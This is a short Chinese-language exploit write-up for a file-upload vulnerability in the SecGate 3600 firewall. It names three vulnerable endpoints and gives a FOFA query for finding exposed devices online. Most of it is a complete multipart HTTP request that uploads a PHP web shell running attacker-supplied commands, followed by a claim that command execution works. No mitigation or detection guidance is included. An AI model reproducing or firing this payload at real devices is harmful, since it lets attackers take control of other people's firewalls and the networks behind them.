Q1-9奇安信-网神SecSSL3600-文件上传

漏洞描述：

网神SecGate 3600防火墙obj_area_import_save、app_av_import_save、sec_web_auth_custom_setting_confsave存在文件上传漏洞，攻击者可以通过该漏洞获取服务器控制权限。

网站图片:

网络测绘:

fofa语法：

FOFA：title=“网神SecGate 3600防火墙”

漏洞复现:

payload：

POST /?g=sec_web_auth_custom_setting_confsave HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)
Accept: */*
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc
Connection: close

------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="certfile";filename="a.php"
Content-Type: text/plain

<?php system($_POST['cmd']);unlink(__FILE__);?>
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="submit_post"

sec_web_auth_custom_setting_confsave
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="certfile_r"

file
------WebKitFormBoundaryJpMyThWnAxbcBBQc--

效果图:

命令执行